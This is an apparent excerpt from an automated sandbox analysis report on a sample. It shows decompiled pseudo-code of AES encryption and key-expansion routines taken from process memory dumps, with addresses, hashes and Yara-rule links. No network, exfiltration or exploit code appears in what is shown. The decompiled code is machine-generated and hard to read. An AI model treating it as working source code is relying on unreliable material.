									asm("movups xmm6, [esi+0x40]");
									asm("xorps xmm7, xmm7");
									_t20 = E00B98BE0(_t20, _t28, _t29);
									asm("movups [edi], xmm2");
									asm("movups [edi+0x10], xmm3");
									asm("movups [edi+0x20], xmm4");
									asm("movups [edi+0x30], xmm5");
									asm("movups [edi+0x40], xmm6");
								}
							}
						}
						goto L34;
					}
					asm("movdqu xmm2, [esi]");
					asm("movdqu xmm3, [esi+0x10]");
					asm("movdqu xmm4, [esi+0x20]");
					asm("movdqu xmm5, [esi+0x30]");
					asm("movdqu xmm6, [esi+0x40]");
					asm("movdqu xmm7, [esi+0x50]");
					_t13 = _t35 + 0x60; // 0x1009e8d
					_t36 = _t13;
					_t21 = _t20 - 0x60;
					while(1) {
						_t22 = E00B98BE0(_t21, _t28, _t29);
						_t29 = _t38;
						_t28 = _t26;
						_t21 = _t22 - 0x60;
						__eflags = _t21;
						if(_t21 < 0) {
							break;
						}
						asm("movups [edi], xmm2");
						asm("movdqu xmm2, [esi]");
						asm("movups [edi+0x10], xmm3");
						asm("movdqu xmm3, [esi+0x10]");
						asm("movups [edi+0x20], xmm4");
						asm("movdqu xmm4, [esi+0x20]");
						asm("movups [edi+0x30], xmm5");
						asm("movdqu xmm5, [esi+0x30]");
						asm("movups [edi+0x40], xmm6");
						asm("movdqu xmm6, [esi+0x40]");
						asm("movups [edi+0x50], xmm7");
						_t32 = _t32 + 0x60;
						asm("movdqu xmm7, [esi+0x50]");
						_t36 = _t36 + 0x60;
					}
					asm("movups [edi], xmm2");
					asm("movups [edi+0x10], xmm3");
					asm("movups [edi+0x20], xmm4");
					asm("movups [edi+0x30], xmm5");
					asm("movups [edi+0x40], xmm6");
					asm("movups [edi+0x50], xmm7");
					_t20 = _t21 + 0x60;
					__eflags = _t20;
					if(_t20 == 0) {
						goto L34;
					}
					goto L23;
				}
				_t39 = _t29;
				_t27 = _t28;
				if(_t20 < 0x60) {
					L7:
					asm("movups xmm2, [esi]");
					_t45 = _t20 - 0x20;
					if(_t45 < 0) {
						asm("movups xmm0, [edx]");
						asm("movups xmm1, [edx+0x10]");
						_t31 = _t29 + 0x20;
						asm("xorps xmm2, xmm0");
						do {
							asm("aesenc xmm2, xmm1");
							_t28 = _t28 - 1;
							__eflags = _t28;
							asm("movups xmm1, [edx]");
							_t12 = _t31 + 0x10; // 0xcccccccc
							_t31 = _t12;
						} while (_t28 != 0);
						asm("aesenclast xmm2, xmm1");
						asm("movups [edi], xmm2");
					} else {
						asm("movups xmm3, [esi+0x10]");
						if(_t45 == 0) {
							_t20 = E00B98820(_t20, _t28, _t29);
							asm("movups [edi], xmm2");
							asm("movups [edi+0x10], xmm3");
						} else {
							asm("movups xmm4, [esi+0x20]");
							_t46 = _t20 - 0x40;
							if(_t46 < 0) {
								_t20 = E00B988E0(_t20, _t28, _t29);
								asm("movups [edi], xmm2");
								asm("movups [edi+0x10], xmm3");
								asm("movups [edi+0x20], xmm4");
							} else {
								asm("movups xmm5, [esi+0x30]");
								if(_t46 == 0) {
									_t20 = E00B989E0(_t20, _t28, _t29);
									asm("movups [edi], xmm2");
									asm("movups [edi+0x10], xmm3");
									asm("movups [edi+0x20], xmm4");
									asm("movups [edi+0x30], xmm5");
								} else {
									asm("movups xmm6, [esi+0x40]");
									asm("xorps xmm7, xmm7");
									_t20 = E00B98B00(_t20, _t28, _t29);
									asm("movups [edi], xmm2");
									asm("movups [edi+0x10], xmm3");
									asm("movups [edi+0x20], xmm4");
									asm("movups [edi+0x30], xmm5");
									asm("movups [edi+0x40], xmm6");
								}
							}
						}
					}
					goto L34;
				} else {
					asm("movdqu xmm2, [esi]");
					asm("movdqu xmm3, [esi+0x10]");
					asm("movdqu xmm4, [esi+0x20]");
					asm("movdqu xmm5, [esi+0x30]");
					asm("movdqu xmm6, [esi+0x40]");
					asm("movdqu xmm7, [esi+0x50]");
					_t7 = _t35 + 0x60; // 0x1009e8d
					_t37 = _t7;
					_t23 = _t20 - 0x60;
					L5:
					_t24 = E00B98B00(_t23, _t28, _t29);
					_t29 = _t39;
					_t28 = _t27;
					_t23 = _t24 - 0x60;
					if(_t23 >= 0) {
						asm("movups [edi], xmm2");
						asm("movdqu xmm2, [esi]");
						asm("movups [edi+0x10], xmm3");
						asm("movdqu xmm3, [esi+0x10]");
						asm("movups [edi+0x20], xmm4");
						asm("movdqu xmm4, [esi+0x20]");
						asm("movups [edi+0x30], xmm5");
						asm("movdqu xmm5, [esi+0x30]");
						asm("movups [edi+0x40], xmm6");
						asm("movdqu xmm6, [esi+0x40]");
						asm("movups [edi+0x50], xmm7");
						_t32 = _t32 + 0x60;
						asm("movdqu xmm7, [esi+0x50]");
						_t37 = _t37 + 0x60;
						goto L5;
					}
					asm("movups [edi], xmm2");
					asm("movups [edi+0x10], xmm3");
					asm("movups [edi+0x20], xmm4");
					asm("movups [edi+0x30], xmm5");
					asm("movups [edi+0x40], xmm6");
					asm("movups [edi+0x50], xmm7");
					_t20 = _t23 + 0x60;
					if(_t20 == 0) {
						goto L34;
					}
					goto L7;
				}
			}























                                                              0x00b98cc4
                                                              0x00b98cc8
                                                              0x00b98cd0
                                                              0x00b98cd4
                                                              0x00b98cd8
                                                              0x00b98cdb
                                                              0x00b99004
                                                              0x00b99004
                                                              0x00b99008
                                                              0x00b9900c
                                                              0x00b99010
                                                              0x00b99014
                                                              0x00b99018
                                                              0x00b9901c
                                                              0x00b99020
                                                              0x00b99028
                                                              0x00b99028
                                                              0x00b98ce1
                                                              0x00b98ce9
                                                              0x00b98e80
                                                              0x00b98e82
                                                              0x00b98e84
                                                              0x00b98e87
                                                              0x00b98f2f
                                                              0x00b98f2f
                                                              0x00b98f32
                                                              0x00b98f35
                                                              0x00b98f80
                                                              0x00b98f83
                                                              0x00b98f87
                                                              0x00b98f8a
                                                              0x00b98f8d
                                                              0x00b98f8d
                                                              0x00b98f92
                                                              0x00b98f92
                                                              0x00b98f93
                                                              0x00b98f96
                                                              0x00b98f96
                                                              0x00b98f96
                                                              0x00b98f9f
                                                              0x00b98fa4
                                                              0x00000000
                                                              0x00b98fa4
                                                              0x00b98f3b
                                                              0x00b98f3f
                                                              0x00b98fb0
                                                              0x00b98fb5
                                                              0x00b98fb8
                                                              0x00b98f45
                                                              0x00b98f45
                                                              0x00b98f49
                                                              0x00b98f4c
                                                              0x00b98fd0
                                                              0x00b98fd5
                                                              0x00b98fd8
                                                              0x00b98fdc
                                                              0x00b98f52
                                                              0x00b98f52
                                                              0x00b98f56
                                                              0x00b98ff0
                                                              0x00b98ff5
                                                              0x00b98ff8
                                                              0x00b98ffc
                                                              0x00b99000
                                                              0x00b98f5c
                                                              0x00b98f5c
                                                              0x00b98f60
                                                              0x00b98f63
                                                              0x00b98f68
                                                              0x00b98f6b
                                                              0x00b98f6f
                                                              0x00b98f73
                                                              0x00b98f77
                                                              0x00b98f77
                                                              0x00b98f56
                                                              0x00b98f4c
                                                              0x00000000
                                                              0x00b98f3f
                                                              0x00b98e8d
                                                              0x00b98e91
                                                              0x00b98e96
                                                              0x00b98e9b
                                                              0x00b98ea0
                                                              0x00b98ea5
                                                              0x00b98eaa
                                                              0x00b98eaa
                                                              0x00b98ead
                                                              0x00b98efa
                                                              0x00b98efa
                                                              0x00b98eff
                                                              0x00b98f01
                                                              0x00b98f03
                                                              0x00b98f03
                                                              0x00b98f06
                                                              0x00000000
                                                              0x00000000
                                                              0x00b98ec0
                                                              0x00b98ec3
                                                              0x00b98ec7
                                                              0x00b98ecb
                                                              0x00b98ed0
                                                              0x00b98ed4
                                                              0x00b98ed9
                                                              0x00b98edd
                                                              0x00b98ee2
                                                              0x00b98ee6
                                                              0x00b98eeb
                                                              0x00b98eef
                                                              0x00b98ef2
                                                              0x00b98ef7
                                                              0x00b98ef7
                                                              0x00b98f0c
                                                              0x00b98f0f
                                                              0x00b98f13
                                                              0x00b98f17
                                                              0x00b98f1b
                                                              0x00b98f1f
                                                              0x00b98f26
                                                              0x00b98f26
                                                              0x00b98f29
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b98f29
                                                              0x00b98cef
                                                              0x00b98cf1
                                                              0x00b98cf6
                                                              0x00b98d9f
                                                              0x00b98d9f
                                                              0x00b98da2
                                                              0x00b98da5
                                                              0x00b98df0
                                                              0x00b98df3
                                                              0x00b98df7
                                                              0x00b98dfa
                                                              0x00b98dfd
                                                              0x00b98dfd
                                                              0x00b98e02
                                                              0x00b98e02
                                                              0x00b98e03
                                                              0x00b98e06
                                                              0x00b98e06
                                                              0x00b98e06
                                                              0x00b98e0f
                                                              0x00b98e14
                                                              0x00b98dab
                                                              0x00b98dab
                                                              0x00b98daf
                                                              0x00b98e20
                                                              0x00b98e25
                                                              0x00b98e28
                                                              0x00b98db5
                                                              0x00b98db5
                                                              0x00b98db9
                                                              0x00b98dbc
                                                              0x00b98e40
                                                              0x00b98e45
                                                              0x00b98e48
                                                              0x00b98e4c
                                                              0x00b98dc2
                                                              0x00b98dc2
                                                              0x00b98dc6
                                                              0x00b98e60
                                                              0x00b98e65
                                                              0x00b98e68
                                                              0x00b98e6c
                                                              0x00b98e70
                                                              0x00b98dcc
                                                              0x00b98dcc
                                                              0x00b98dd0
                                                              0x00b98dd3
                                                              0x00b98dd8
                                                              0x00b98ddb
                                                              0x00b98ddf
                                                              0x00b98de3
                                                              0x00b98de7
                                                              0x00b98de7
                                                              0x00b98dc6
                                                              0x00b98dbc
                                                              0x00b98daf
                                                              0x00000000
                                                              0x00b98cfc
                                                              0x00b98cfc
                                                              0x00b98d00
                                                              0x00b98d05
                                                              0x00b98d0a
                                                              0x00b98d0f
                                                              0x00b98d14
                                                              0x00b98d19
                                                              0x00b98d19
                                                              0x00b98d1c
                                                              0x00b98d6a
                                                              0x00b98d6a
                                                              0x00b98d6f
                                                              0x00b98d71
                                                              0x00b98d73
                                                              0x00b98d76
                                                              0x00b98d30
                                                              0x00b98d33
                                                              0x00b98d37
                                                              0x00b98d3b
                                                              0x00b98d40
                                                              0x00b98d44
                                                              0x00b98d49
                                                              0x00b98d4d
                                                              0x00b98d52
                                                              0x00b98d56
                                                              0x00b98d5b
                                                              0x00b98d5f
                                                              0x00b98d62
                                                              0x00b98d67
                                                              0x00000000
                                                              0x00b98d67
                                                              0x00b98d7c
                                                              0x00b98d7f
                                                              0x00b98d83
                                                              0x00b98d87
                                                              0x00b98d8b
                                                              0x00b98d8f
                                                              0x00b98d96
                                                              0x00b98d99
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b98d99

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e92871ad0a21b8d8f968a3ee2c10e49db5235dd4a4bc92c1192d976ed0dae59
                                                              • Instruction ID: d8c1ba3615bab8d2dd397b1ed754021f235347f4380f3281c0374f4895e94579
                                                              • Opcode Fuzzy Hash: 6e92871ad0a21b8d8f968a3ee2c10e49db5235dd4a4bc92c1192d976ed0dae59
                                                              • Instruction Fuzzy Hash: E7A12111D18FD793E7155F3986405B2B7A0FEBA308B11FB58EDD965922DF20B6E4C280
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA1529, Relevance: .2, Instructions: 197COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00BA1529() {
				signed int _t123;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				void* _t132;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				unsigned int _t154;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr _t200;
				signed int _t202;
				signed int _t205;
				signed int _t208;
				unsigned int _t211;
				unsigned int _t214;
				unsigned int _t217;
				unsigned int _t219;
				signed int* _t221;
				signed int* _t223;
				void* _t241;
				void* _t243;
				void* _t245;

				_pop(_t241);
				_t1 = _t241 - 0x29e9; // 0xa56363c6
				_t243 = _t1 + 0x880;
				_t200 =  *((intOrPtr*)(_t245 + 0x1c));
				if(_t200 == 0x80) {
					_t123 =  *_t223;
					_t211 = _t223[3];
					 *_t221 = _t123;
					_t221[1] = _t223[1];
					_t221[2] = _t223[2];
					_t221[3] = _t211;
					_t202 = 0;
					while(1) {
						_t128 = _t123 ^ ( *(_t243 + (_t211 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018 ^  *(_t243 + (_t211 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t243 + (_t211 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t243 + (_t211 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^  *(_t243 + 0x380 + _t202 * 4);
						_t221[4] = _t128;
						_t129 = _t128 ^ _t221[1];
						_t221[5] = _t129;
						_t130 = _t129 ^ _t221[2];
						_t221[6] = _t130;
						_t221[7] = _t130 ^ _t221[3];
						_t202 = _t202 + 1;
						_t221 =  &(_t221[4]);
						if(_t202 >= 0xa) {
							break;
						}
						_t123 =  *_t221;
						_t211 = _t221[3];
					}
					_t221[0x14] = 0xa;
					_t132 = 0;
				} else {
					if(_t200 == 0xc0) {
						_t133 =  *_t223;
						 *_t221 = _t133;
						_t221[1] = _t223[1];
						_t221[2] = _t223[2];
						_t221[3] = _t223[3];
						_t214 = _t223[5];
						_t221[4] = _t223[4];
						_t221[5] = _t214;
						_t205 = 0;
						while(1) {
							_t138 = _t133 ^ ( *(_t243 + (_t214 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018 ^  *(_t243 + (_t214 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t243 + (_t214 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t243 + (_t214 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^  *(_t243 + 0x380 + _t205 * 4);
							_t221[6] = _t138;
							_t139 = _t138 ^ _t221[1];
							_t221[7] = _t139;
							_t140 = _t139 ^ _t221[2];
							_t221[8] = _t140;
							_t141 = _t140 ^ _t221[3];
							_t221[9] = _t141;
							if(_t205 == 7) {
								break;
							}
							_t205 = _t205 + 1;
							_t142 = _t141 ^ _t221[4];
							_t221[0xa] = _t142;
							_t221[0xb] = _t142 ^ _t221[5];
							_t221 =  &(_t221[6]);
							_t133 =  *_t221;
							_t214 = _t221[5];
						}
						_t221[0x12] = 0xc;
						_t132 = 0;
					} else {
						if(_t200 == 0x100) {
							 *_t221 =  *_t223;
							_t221[1] = _t223[1];
							_t221[2] = _t223[2];
							_t221[3] = _t223[3];
							_t217 = _t223[7];
							_t221[4] = _t223[4];
							_t221[5] = _t223[5];
							_t221[6] = _t223[6];
							_t221[7] = _t217;
							_t208 = 0;
							while(1) {
								_t151 =  *_t221 ^ ( *(_t243 + (_t217 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018 ^  *(_t243 + (_t217 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t243 + (_t217 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t243 + (_t217 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^  *(_t243 + 0x380 + _t208 * 4);
								_t221[8] = _t151;
								_t152 = _t151 ^ _t221[1];
								_t221[9] = _t152;
								_t153 = _t152 ^ _t221[2];
								_t221[0xa] = _t153;
								_t154 = _t153 ^ _t221[3];
								_t221[0xb] = _t154;
								if(_t208 == 6) {
									break;
								}
								_t208 = _t208 + 1;
								_t219 = _t154;
								_t159 = _t221[4] ^  *(_t243 + (_t219 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t243 + (_t219 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t243 + (_t219 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t243 + (_t219 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000018;
								_t221[0xc] = _t159;
								_t160 = _t159 ^ _t221[5];
								_t221[0xd] = _t160;
								_t161 = _t160 ^ _t221[6];
								_t221[0xe] = _t161;
								_t221[0xf] = _t161 ^ _t221[7];
								_t221 =  &(_t221[8]);
								_t217 = _t221[7];
							}
							_t221[0xc] = 0xe;
							_t132 = 0;
						} else {
							_t132 = 0xfffffffe;
						}
					}
				}
				return _t132;
			}


































                                                              0x00ba1529
                                                              0x00ba152a
                                                              0x00ba1530
                                                              0x00ba154e
                                                              0x00ba1558
                                                              0x00ba1580
                                                              0x00ba1588
                                                              0x00ba158b
                                                              0x00ba158d
                                                              0x00ba1590
                                                              0x00ba1593
                                                              0x00ba1596
                                                              0x00ba15a5
                                                              0x00ba15d9
                                                              0x00ba15e0
                                                              0x00ba15e3
                                                              0x00ba15e6
                                                              0x00ba15e9
                                                              0x00ba15ec
                                                              0x00ba15f2
                                                              0x00ba15f5
                                                              0x00ba15f6
                                                              0x00ba15fc
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba15a0
                                                              0x00ba15a2
                                                              0x00ba15a2
                                                              0x00ba1602
                                                              0x00ba1609
                                                              0x00ba155e
                                                              0x00ba1564
                                                              0x00ba1610
                                                              0x00ba161b
                                                              0x00ba161d
                                                              0x00ba1620
                                                              0x00ba1623
                                                              0x00ba1629
                                                              0x00ba162c
                                                              0x00ba162f
                                                              0x00ba1632
                                                              0x00ba1641
                                                              0x00ba1675
                                                              0x00ba167c
                                                              0x00ba167f
                                                              0x00ba1682
                                                              0x00ba1685
                                                              0x00ba1688
                                                              0x00ba168b
                                                              0x00ba168e
                                                              0x00ba1694
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba169a
                                                              0x00ba169b
                                                              0x00ba169e
                                                              0x00ba16a4
                                                              0x00ba16a7
                                                              0x00ba163c
                                                              0x00ba163e
                                                              0x00ba163e
                                                              0x00ba16af
                                                              0x00ba16b6
                                                              0x00ba156a
                                                              0x00ba1570
                                                              0x00ba16c8
                                                              0x00ba16ca
                                                              0x00ba16cd
                                                              0x00ba16d0
                                                              0x00ba16dc
                                                              0x00ba16df
                                                              0x00ba16e2
                                                              0x00ba16e5
                                                              0x00ba16e8
                                                              0x00ba16eb
                                                              0x00ba16f7
                                                              0x00ba172d
                                                              0x00ba1734
                                                              0x00ba1737
                                                              0x00ba173a
                                                              0x00ba173d
                                                              0x00ba1740
                                                              0x00ba1743
                                                              0x00ba1746
                                                              0x00ba174c
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba1752
                                                              0x00ba1753
                                                              0x00ba178a
                                                              0x00ba178c
                                                              0x00ba178f
                                                              0x00ba1792
                                                              0x00ba1795
                                                              0x00ba1798
                                                              0x00ba179e
                                                              0x00ba17a1
                                                              0x00ba16f4
                                                              0x00ba16f4
                                                              0x00ba17a9
                                                              0x00ba17b0
                                                              0x00ba1576
                                                              0x00ba1576
                                                              0x00ba1576
                                                              0x00ba1570
                                                              0x00ba1564
                                                              0x00ba17c0

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c55ec42e37731b7a14bb140ff7fe4e7a6f44855d55ca4aaab8372080e5fa6381
                                                              • Instruction ID: c29d753f4f563c9f23a7a98ede94d15f79ed6f42696223d0a9e5047b8cb2fdf4
                                                              • Opcode Fuzzy Hash: c55ec42e37731b7a14bb140ff7fe4e7a6f44855d55ca4aaab8372080e5fa6381
                                                              • Instruction Fuzzy Hash: 9A8156B5A14B669BD754CF2EC8C045AFBF1FB08310B518A2AD8A583B40D334F965DFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9D960, Relevance: .2, Instructions: 183COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 45%
                                                              			E00B9D960(void* __ebp, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, intOrPtr* _a60, intOrPtr _a64, unsigned int _a68) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t117;
				signed int* _t136;
				signed int* _t144;
				unsigned int _t152;
				signed int _t154;
				signed int _t165;
				intOrPtr _t178;
				unsigned int _t187;
				intOrPtr _t196;
				signed int _t197;
				signed int _t199;
				intOrPtr* _t200;
				unsigned int _t202;
				signed int _t205;
				signed int _t207;
				unsigned int _t209;
				void* _t214;

				E00C6BB10(0x38);
				_t117 =  *0xcc5970; // 0x851ab4dd
				_a52 = _t117 ^ _t205;
				_t154 = _a68 >> 4;
				_t200 = _a60;
				_t196 =  *((intOrPtr*)(_t200 + 0x48));
				_t202 = 0;
				_a4 = _a64;
				_t178 = _t154 + _t196;
				asm("adc ebp, eax");
				_t197 = _t196 + 1;
				asm("adc eax, 0x0");
				_t152 =  *(_t200 + 0x4c);
				_a16 = _t154;
				_a8 = _t178;
				_a12 = 0;
				_t209 = _t152;
				if(_t209 > 0 || _t209 >= 0 && _t197 > _t178) {
					L11:
					_t199 = _a68 & 0x0000000f;
					if(_t199 > 0) {
						 *(_t200 + 0x6c) =  *(_t200 + 0x6c) ^  *(_t200 + 0x24);
						 *(_t200 + 0x68) =  *(_t200 + 0x68) ^  *(_t200 + 0x20);
						 *(_t200 + 0x74) =  *(_t200 + 0x74) ^  *(_t200 + 0x2c);
						 *(_t200 + 0x70) =  *(_t200 + 0x70) ^  *(_t200 + 0x28);
						_a20 = 0;
						_a24 = 0;
						_a28 = 0;
						_a32 = 0;
						E00C6B7A0(_t152, _t199, _t200,  &_a20, (_t154 << 4) + _a4, _t199);
						 *((char*)(_t205 + _t199 + 0x30)) = 0x80;
						_a36 =  *(_t200 + 0x68) ^ _a20;
						_a40 =  *(_t200 + 0x6c) ^ _a24;
						_a44 = _a28 ^  *(_t200 + 0x70);
						_a48 = _a32 ^  *(_t200 + 0x74);
						 *((intOrPtr*)( *_t200))( &_a36,  &_a20,  *((intOrPtr*)(_t200 + 8)));
						 *(_t200 + 0x78) =  *(_t200 + 0x78) ^ _a20;
						 *(_t200 + 0x7c) =  *(_t200 + 0x7c) ^ _a24;
						 *(_t200 + 0x80) =  *(_t200 + 0x80) ^ _a28;
						_t178 = _a8;
						_t205 = _t205 + 0x18;
						 *(_t200 + 0x84) =  *(_t200 + 0x84) ^ _a32;
					}
					 *(_t200 + 0x4c) = _t202;
					 *((intOrPtr*)(_t200 + 0x48)) = _t178;
					return E00C69C26(1, _t152, _a52 ^ _t205, _t178, _t199, _t200);
				} else {
					do {
						_t165 = _t197;
						_t187 = _t152;
						_v0 = 0;
						if((_t197 & 0x00000001) == 0) {
							do {
								_v0 = _v0 + 1;
								_t165 = (_t187 << 0x00000020 | _t165) >> 1;
								_t187 = _t187 >> 1;
							} while ((_t165 & 0x00000001) == 0);
						}
						_push(_v0);
						_push(_t200);
						_t136 = E00B9D530();
						_t207 = _t205 + 8;
						if(_t136 == 0) {
							return E00C69C26(0, _t152, _a52 ^ _t207, _t187, _t197, _t200);
						} else {
							goto L7;
						}
						goto L15;
						L7:
						 *(_t200 + 0x68) =  *(_t200 + 0x68) ^  *_t136;
						 *(_t200 + 0x6c) =  *(_t200 + 0x6c) ^ _t136[1];
						 *(_t200 + 0x70) =  *(_t200 + 0x70) ^ _t136[2];
						 *(_t200 + 0x74) =  *(_t200 + 0x74) ^ _t136[3];
						_t144 = (_t197 -  *((intOrPtr*)(_t200 + 0x48)) - 1 << 4) + _a4;
						_a20 =  *(_t200 + 0x68) ^  *_t144;
						_a24 =  *(_t200 + 0x6c) ^ _t144[1];
						_a28 = _t144[2] ^  *(_t200 + 0x70);
						_a32 = _t144[3] ^  *(_t200 + 0x74);
						 *((intOrPtr*)( *_t200))( &_a20,  &_a36,  *((intOrPtr*)(_t200 + 8)));
						 *(_t200 + 0x78) =  *(_t200 + 0x78) ^ _a36;
						 *(_t200 + 0x7c) =  *(_t200 + 0x7c) ^ _a40;
						 *(_t200 + 0x80) =  *(_t200 + 0x80) ^ _a44;
						 *(_t200 + 0x84) =  *(_t200 + 0x84) ^ _a48;
						_t202 = _a12;
						_t205 = _t207 + 0xc;
						_t197 = _t197 + 1;
						asm("adc ebx, 0x0");
						_t214 = _t152 - _t202;
					} while (_t214 < 0 || _t214 <= 0 && _t197 <= _a8);
					_t154 = _a16;
					_t178 = _a8;
					goto L11;
				}
				L15:
			}
























                                                              0x00b9d965
                                                              0x00b9d96a
                                                              0x00b9d971
                                                              0x00b9d97f
                                                              0x00b9d983
                                                              0x00b9d988
                                                              0x00b9d98b
                                                              0x00b9d98d
                                                              0x00b9d996
                                                              0x00b9d998
                                                              0x00b9d99a
                                                              0x00b9d99d
                                                              0x00b9d9a0
                                                              0x00b9d9a2
                                                              0x00b9d9a6
                                                              0x00b9d9aa
                                                              0x00b9d9ae
                                                              0x00b9d9b0
                                                              0x00b9dab3
                                                              0x00b9dab7
                                                              0x00b9daba
                                                              0x00b9dac3
                                                              0x00b9dacc
                                                              0x00b9dacf
                                                              0x00b9dad5
                                                              0x00b9dae8
                                                              0x00b9daec
                                                              0x00b9daf0
                                                              0x00b9daf4
                                                              0x00b9daf8
                                                              0x00b9db03
                                                              0x00b9db17
                                                              0x00b9db22
                                                              0x00b9db2c
                                                              0x00b9db34
                                                              0x00b9db3e
                                                              0x00b9db44
                                                              0x00b9db4f
                                                              0x00b9db56
                                                              0x00b9db5c
                                                              0x00b9db60
                                                              0x00b9db63
                                                              0x00b9db63
                                                              0x00b9db6a
                                                              0x00b9db6d
                                                              0x00b9db86
                                                              0x00b9d9c0
                                                              0x00b9d9c0
                                                              0x00b9d9c9
                                                              0x00b9d9cb
                                                              0x00b9d9cd
                                                              0x00b9d9d5
                                                              0x00b9d9e0
                                                              0x00b9d9e0
                                                              0x00b9d9e4
                                                              0x00b9d9ef
                                                              0x00b9d9f1
                                                              0x00b9d9e0
                                                              0x00b9d9f9
                                                              0x00b9d9fa
                                                              0x00b9d9fb
                                                              0x00b9da00
                                                              0x00b9da05
                                                              0x00b9db9b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9da0b
                                                              0x00b9da0d
                                                              0x00b9da13
                                                              0x00b9da19
                                                              0x00b9da1f
                                                              0x00b9da31
                                                              0x00b9da3a
                                                              0x00b9da3e
                                                              0x00b9da54
                                                              0x00b9da5c
                                                              0x00b9da66
                                                              0x00b9da6c
                                                              0x00b9da7b
                                                              0x00b9da7e
                                                              0x00b9da84
                                                              0x00b9da8a
                                                              0x00b9da8e
                                                              0x00b9da91
                                                              0x00b9da94
                                                              0x00b9da97
                                                              0x00b9da97
                                                              0x00b9daab
                                                              0x00b9daaf
                                                              0x00000000
                                                              0x00b9daaf
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
